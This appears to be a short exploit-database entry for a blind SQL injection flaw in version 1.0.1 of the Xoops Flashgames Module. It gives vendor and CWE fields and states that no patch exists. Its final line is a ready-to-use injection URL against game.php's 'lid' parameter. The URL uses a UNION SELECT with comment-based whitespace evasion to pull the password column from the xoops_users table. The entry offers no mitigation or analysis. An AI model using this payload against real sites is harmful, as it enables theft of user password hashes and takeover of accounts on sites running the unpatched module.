vendor:
Xoops Flashgames Module
by:
Bulan: Cyber-security.org
N/A
CVSS
N/A
Remote Blind SQL Injection
CWE
Product Name: Xoops Flashgames Module
Affected Version From: 1.0.1
Affected Version To: 1.0.1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Xoops Flashgames Module 1.0.1 Remote Blind SQL Injection
/modules/flashgames/game.php?lid=-19/**/UNION/**/SELECT/**/0,1,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*